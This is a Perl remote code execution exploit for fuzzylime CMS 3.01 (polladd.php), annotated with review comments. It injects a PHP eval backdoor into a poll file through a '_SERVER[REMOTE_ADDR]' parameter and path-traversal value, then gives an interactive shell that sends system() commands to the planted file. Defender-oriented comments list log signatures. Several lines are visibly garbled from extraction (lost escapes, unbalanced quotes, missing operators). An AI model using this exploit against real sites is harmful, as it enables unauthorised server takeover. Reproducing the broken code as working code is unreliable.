fuzzylime cms 3.01 (polladd.php poll) Remote Code Execution Exploit (pl)

#!/usr/bin/perl

#!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!!!UPDATED!!

# After I noticed that there was a problem changing $cmd, I fixed it. This is the result.

##

## Fuzzylime 3.01 Remote Code Execution

## Credits: real and inphex

##

## [C:]# perl ye.pl host /path/

## :>id

## uid=63676(dswrealty) gid=888(vusers) groups=33(www-data)

##

use LWP::UserAgent;

use HTTP::Cookies;

use Switch;

# Target comes from the command line: the first argument is the host (the
# scheme "http://" is prepended), the second is the application's base path.
# Neither value is validated before being used to build request URLs.
$host_ = "http://".shift;

$path_ = shift;

# First request description, handed to start() below. start() treats every
# key other than "options" and "sending_options" (here: "description") as
# banner text and prints its first element.
$info{'info'} = {

# NOTE(review): the lone "n" characters in this string look like newline
# escapes whose backslash was lost when the page was extracted - confirm
# against the original advisory.
"description" => ["#################################################nFuzzyLime Remote Code Executionn#################################################nreal & inphexn"],

# Client settings read by start(): an empty agent falls back to
# "Mozilla/5.0", an empty proxy means no proxy is set, the default_headers
# pair is pushed as a request header, timeout is passed to the user agent,
# and an empty cookie means no Cookie header is added.
"options" =>

{

"agent" => "",

"proxy" => "",

"default_headers" => [

["key","value"]],

"timeout" => 2,

"cookie" =>

{

"cookie" => [""],

},

},

# Where and how the request is sent. "method_a" selects the handler in
# start(); each "attack" entry is a [kind, name, value] triple that
# get_d_p_s() concatenates into the query string (kind "get") or the POST
# body (kind "post").
"sending_options" =>

{

"host" => $host_,

"path" => $path_."code/polladd.php",

"port" => 80,

"method_a" => "REMOTE_CODE_EXECUTION",

# All three entries are of kind "get", so this stage is a single GET request
# to code/polladd.php with three query parameters.
# Defender's view: a request to code/polladd.php whose query string carries a
# "poll" value made of dot/slash sequences together with a parameter
# literally named _SERVER[REMOTE_ADDR] is the log signature of this stage;
# an ordinary client does not send a parameter with that name.
"attack" =>

{

"poll" => ["get","poll","....//swear"],

"log" => ["get","log","1"],

# NOTE(review): as printed, the quotes in this value are unbalanced, so the
# line does not parse; the text is kept exactly as the page shows it. The
# value is PHP source that evals the POST field "cmd".
# Presumably the application writes this parameter into a file under
# code/polls/ (the second stage below requests code/polls/swear.inc.php) -
# that behaviour is not visible here; verify against the application source.
"_SERVER[REMOTE_ADDR]" => ["get","_SERVER[REMOTE_ADDR]","";eval("$_POST[cmd]"); ?>"],

},

},

};

# Send the first request; attack() (via start()) stores the response body in
# the description hash under the id 222. The stored body is not read again in
# this listing.
&start($info{'info'},222);

# Interactive loop with no exit condition. Each line read from STDIN is
# wrapped in system('...') with no escaping and sent as the POST field "cmd"
# to code/polls/swear.inc.php; the response body stored under id 221 is then
# printed.
# Defender's view: POST requests to a .inc.php file under code/polls/ with a
# "cmd" body field are the log signature of this stage. During incident
# response, check code/polls/ for files that contain an eval() of request
# data.
while () {

print ":>";

$cmd = <STDIN>;

chomp($cmd);

# Second request description: same client options as the first one, but the
# single "attack" entry is of kind "post".
$info1{'info1'} = { "options" =>{"agent" => "", "proxy" => "", "default_headers" => [ ["key","value"]], "timeout" => 2, "cookie" => {"cookie" => [""],},},"sending_options" =>{"host" => $host_, "path" => $path_."code/polls/swear.inc.php", "port" => 80, "method_a" => "REMOTE_CODE_EXECUTION", "attack" =>{

"cmd" => ["post","cmd","system('".$cmd."');"],},},};

&start($info1{'info1'},221);

print ${$info1{'info1'}}{221}{'content'};

}

# start(\%description, $id)
#
# Generic request driver. Reads the client settings and the request
# description from the hash reference, configures an LWP::UserAgent, and
# dispatches on the "method_a" string. The named subs below are written
# inside this sub's braces; the closing brace of start is the last line of
# the listing.
#
# Arguments: a hash reference in the shape built at the top of the script,
# and an id under which attack() stores the response body. A third argument
# is shifted into $s but both callers on this page pass only two.
#
# Apart from the one lexical list below, the variables assigned here are
# undeclared package globals ($a_, $id, $ua, $get_dA, $post_dA, ...); the
# nested subs rely on them instead of taking parameters.
sub start

{

$a_ = shift;

$id = shift;

$post_dA = "";

# get_d_p_s() reads the global $a_ set above and returns the concatenated
# "name=value&" string for the requested kind.
$get_dA = get_d_p_s("get");

$post_dA = get_d_p_s("post");

# NOTE(review): $c appears twice in this declaration list.
my ($x,$c,$m,$h,$ff,$kf,$hp,$c,$cccc) = (0,0,0,0,0,0,0,0,0);

# Counters used by sql_injection_blind()/check(): $ii is a character code
# (48 is "0"), $hh a position counter.
$jj = 1;

$ii = 48;

$hh = 1;

$ppp = 0;

$s = shift;

$a = "";

$res_p = "";

$h = "";

$ua= "";

$agent= "";

$k= "";

$v= "";

$get_data= "";

$post_data= "";

$header_dA = "";

# Oddly named copies of the target host, path and port from the description.
$h_host_h_xdsjaop = $a_->{'sending_options'}{'host'};

$h_path_h_xdsjaop = $a_->{'sending_options'}{'path'};

$h_port_h_xdsjaop = $a_->{'sending_options'}{'port'};

$method_m = $a_->{'sending_options'}{'method_a'};

$ua = LWP::UserAgent->new;

$ua->timeout($a_->{'options'}{'timeout'});

if ($a_->{'options'}{'proxy'}) {

$ua->proxy(['http', 'ftp'] => $a_->{'options'}{'proxy'});

}

# With an empty "agent" option the User-Agent header is the bare string
# "Mozilla/5.0". Defender's view: that exact, truncated User-Agent is a
# usable detection hint for traffic produced by this script.
$agent = $a_->{'options'}{'agent'} || "Mozilla/5.0";

$ua->agent($agent);

{

# Banner: for every key other than "options" and "sending_options", print
# the first element of its array once per element of that array.
while (($k,$v) = each(%{$a_}))

{

if ($k ne "options" && $k ne "sending_options")

{

foreach $r (@{$a_->{$k}})

{

print $a_->{$k}[0];

}

}

}

# Push the configured default headers onto the user agent.
# NOTE(review): as printed, "$m ;" is an expression statement with no effect,
# so every iteration pushes entry [0]; the listing appears to have lost
# characters in extraction.
foreach $j (@{$a_->{'options'}{'default_headers'}})

{

$ua->default_headers->push_header($a_->{'options'}{'default_headers'}[$m][0] => $a_->{'options'}{'default_headers'}[$m][1]);

$m ;

}

# Add a Cookie header only when the first cookie entry is a true value.
if ($a_->{'options'}{'cookie'}{'cookie'}[0])

{

$ua->default_headers->push_header('Cookie' => $a_->{'options'}{'cookie'}{'cookie'}[0]);

}

}

# Dispatch on the method string. switch/case come from the Switch module
# loaded at the top of the script. Every branch, including the default,
# calls attack() except "SQL_INJECTION_BLIND".
switch ($method_m)

{

case "attack" { &attack();}

case "SQL_INJECTION_BLIND" { &sql_injection_blind();}

case "REMOTE_COMMAND_EXECUTION" { &attack();}

case "REMOTE_CODE_EXECUTION" {&attack();}

case "REMOTE_FILE_INCLUSION" { &attack(); }

case "LOCAL_FILE_INCLUSION" { &attack(); }

else { &attack(); }

}

# attack()
#
# Sends one request built from the globals prepared by start() and stores the
# response body in the description hash under $id ('content'). The request is
# a POST when get_d_p_s("post") produced a non-empty body, otherwise a GET;
# in both cases the "get" parameters are appended to the path after "?".
#
# After the request, each entry of an optional 'regex' list is matched
# against the body and its capture groups are copied into the description
# hash under $id ('regex'). Neither request description on this page defines
# a 'regex' entry, so that loop does not execute for them.
sub attack

{

# Local counters; they start undefined.
my ($jj);

my ($h);

my($x);

if ($post_dA eq "") {

$method = "get";

} elsif ($post_dA ne "")

{

$method = "post";

}

if ($method eq "get") {

$res_p = get_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA);

${$a_}{$id}{'content'} = $res_p;

foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})

{

# The pattern text comes from the description hash and is interpolated
# without quoting.
$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;

# ${$jj} is a symbolic reference to the numbered capture variable; element
# [1] of the regex entry is the upper bound on the capture number.
# NOTE(review): as printed, "$x ;", "$jj ;" and "$h ;" are expression
# statements with no effect, so none of the counters advance.
while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])

{

if (${$jj} ne "")

{

${$a_}{$id}{'regex'}[$h][$x] = ${$jj};

$x ;

}

$jj ;

}

$h ;

}

} elsif ($method eq "post")

{

# Same flow as the GET branch, with the "post" parameters sent as a
# form-encoded body. The body is passed as built, with no URL-encoding step.
$res_p = post_data($h_host_h_xdsjaop,$h_path_h_xdsjaop."?".$get_dA,"application/x-www-form-urlencoded",$post_dA);

${$a_}{$id}{'content'} = $res_p;

foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})

{

$res_p =~ /$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/;

while ($jj <= $a_->{'sending_options'}{'attack'}{'regex'}[$h][1])

{

if (${$jj} ne "")

{

${$a_}{$id}{'regex'}[$h][$x] = ${$jj};

$x ;

}

$jj ;

}

$h ;

}

}

}

# sql_injection_blind()
#
# Generic helper of the request framework; it is only reached when "method_a"
# is "SQL_INJECTION_BLIND", which neither request description on this page
# uses. It loops over character codes starting at 48 while $ii <= 120, writes
# progress to STDOUT, calls check() for each code and appends accepted
# characters to $chr.
# NOTE(review): as printed, "$hh ;" and "$ii ;" have no effect, so the
# counters never advance in this listing.
sub sql_injection_blind

{

while ()

{

while ($ii <= 120)

{

$itsx = "[".chr($ii)."]";

$l = length($itsx);

# NOTE(review): presumably "b" was a backspace escape before extraction, used
# to overwrite the progress marker - confirm against the original.
$b = ("b")x$l;

syswrite STDOUT,$b.$itsx;

if(check($ii,$hh) == 1)

{

syswrite STDOUT,$b.chr($ii)."---";

$hh ;

$chr = $chr.chr($ii);

}

$ii ;

}

push(@ffs,length($chr));

# Exit condition compares the last index of @ffs minus 999 with the scalar
# $ffs, which is not assigned anywhere in this listing.
if (($#ffs - 999) == $ffs)

{

exit;

}

$ii = 48;

}

}

# check($ii, $hh)
#
# Sends one probe request with the two values substituted into the parameter
# strings by modify() and returns 1 or 0 depending on whether the first
# 'regex' entry matches the response body. Used only by
# sql_injection_blind().
#
# Both loops return during their first iteration, so only the first 'regex'
# entry is ever consulted and the trailing "$h ;" is never reached. In the
# GET branch element [2] of the entry selects whether a match means 1 or 0;
# the POST branch ignores that flag.
sub check($$)

{

my ($h);

my ($a);

# The arguments overwrite the globals of the same name.
$ii = shift;

$hh = shift;

if (get_d_p_s("post") ne "")

{

$method = "post";

} else { $method = "get";}

if ($method eq "get")

{

$ppp ;

$query = modify($get_dA,$ii,$hh);

$res_p = get_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query);

foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})

{

if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)

{

if ($a_->{'sending_options'}{'attack'}{'regex'}[$h][2] == 1) {

return 1;

} else { return 0;}

}

else

{

if ($a_->{'sending_options'}{'attack'}{'regex'}[$h][2] == 1) {

return 0;

}else { return 1;}

}

$h ;

}

} elsif ($method eq "post")

{

$ppp ;

$query_g = modify($get_dA,$ii,$hh);

$query_p = modify($post_dA,$ii,$hh);

$res_p = post_data($h_host_h_xdsjaop,$a_->{'sending_options'}{'path'}."?".$query_g,"application/x-www-form-urlencoded",$query_p);

foreach $a (@{$a_->{'sending_options'}{'attack'}{'regex'}})

{

if ($res_p =~m/$a_->{'sending_options'}{'attack'}{'regex'}[$h][0]/)

{

return 1;

}

else

{

return 0;

}

$h ;

}

}

}

# modify($string, $replace_by, $replace_by1)
#
# Placeholder substitution for check(): returns $string with the span found
# via the value of $i replaced by $replace_by and the span found via the
# value of $h replaced by $replace_by1; when neither pattern matches, the
# string is returned unchanged.
#
# NOTE(review): $i is not assigned anywhere in this listing. As printed, each
# substr(..., rindex(...) 2) call lacks an operator between the rindex(...)
# result and the 2, so these lines do not parse; the text is kept as the page
# shows it.
sub modify($$$)

{

$string = shift;

$replace_by = shift;

$replace_by1 = shift;

if ($string !~/$i/ && $string !~/$h/) {

return $string;

} elsif ($string !~/$i/)

{

$ff = substr($string,0,index($string,"$h"));

$ee = substr($string,rindex($string,"$h") 2);

$string = $ff.$replace_by1.$ee;

return $string;

} elsif ($string !~/$h/)

{

$f = substr($string,0,index($string,"$i"));

$e = substr($string,rindex($string,"$i") 2);

$string = $f.$replace_by.$e;

return $string;

} else

{

$f = substr($string,0,index($string,"$i"));

$e = substr($string,rindex($string,"$i") 2);

$string = $f.$replace_by.$e;

$ff = substr($string,0,index($string,"$h"));

$ee = substr($string,rindex($string,"$h") 2);

$string = $ff.$replace_by1.$ee;

return $string;

}

}

# get_d_p_s($kind)
#
# Flattens the "attack" entries of the current description ($a_) into request
# data. Each entry is a [kind, name, value] triple: "post" and "get" entries
# are concatenated as "name=value&" strings, "header" entries are collected
# into %header_dA.
#
# Returns the GET string for "get", the POST string for "post", or the header
# hash (as a list) for "header". Names and values are joined as they are,
# with no URL-encoding, and each string keeps its trailing "&".
sub get_d_p_s

{

$k = 0;

$v = 0;

$g_d_p_s = shift;

@post = ();

@get = ();

$post_data = "";

$get_data = "";

$header_data = "";

%header_dA = ();

$p = "";

$g = "";

# The kind is tested with an unanchored pattern match, not string equality.
while (($k,$v) = each(%{$a_->{'sending_options'}{'attack'}}))

{

if ($a_->{'sending_options'}{'attack'}{$k}[0] =~/post/)

{

$p .= $a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]."&";

} elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~/get/) {

$g .= $a_->{'sending_options'}{'attack'}{$k}[1]."=".$a_->{'sending_options'}{'attack'}{$k}[2]."&";

} elsif ($a_->{'sending_options'}{'attack'}{$k}[0] =~ "header")

{

$header_dA{$a_->{'sending_options'}{'attack'}{$k}[1]} = $a_->{'sending_options'}{'attack'}{$k}[2];

}

}

if ($g_d_p_s eq "get")

{

return $g;

}

elsif ($g_d_p_s eq "post")

{

return $p;

} elsif ($g_d_p_s eq "header")

{

return %header_dA;

}

# Only reached when $kind is none of the three selectors above.
@a_ = ();

}

# get_data($host, $path)
#
# Issues a GET to host ":" port path with the shared user agent and returns
# the response body. The arguments overwrite the globals of the same name;
# the port is read from the current description. Any "header" entries are
# pushed onto the user agent's default headers first. The response status is
# not checked.
sub get_data

{

$h_host_h_xdsjaop = shift;

$h_path_h_xdsjaop = shift;

%hash = get_d_p_s("header");

while (($u,$c) = each(%hash))

{

$ua->default_headers->push_header($u => $c);

}

$req = $ua->get($h_host_h_xdsjaop.":".$a_->{'sending_options'}{'port'}.$h_path_h_xdsjaop);

return $req->content;

}

# post_data($host, $path, $content_type, $body)
#
# Issues a POST to host ":" port path with the given content type and body
# and returns the response body. As in get_data(), the arguments overwrite
# the globals, "header" entries are pushed onto the user agent first, and the
# response status is not checked.
sub post_data

{

$h_host_h_xdsjaop = shift;

$h_path_h_xdsjaop = shift;

$content_type = shift;

$send = shift;

%hash = get_d_p_s("header");

while (($u,$c) = each(%hash))

{

$ua->default_headers->push_header($u => $c);

}

$req = HTTP::Request->new(POST => $h_host_h_xdsjaop.":".$a_->{'sending_options'}{'port'}.$h_path_h_xdsjaop);

$req->content_type($content_type);

$req->content($send);

$res = $ua->request($req);

return $res->content;

}

}
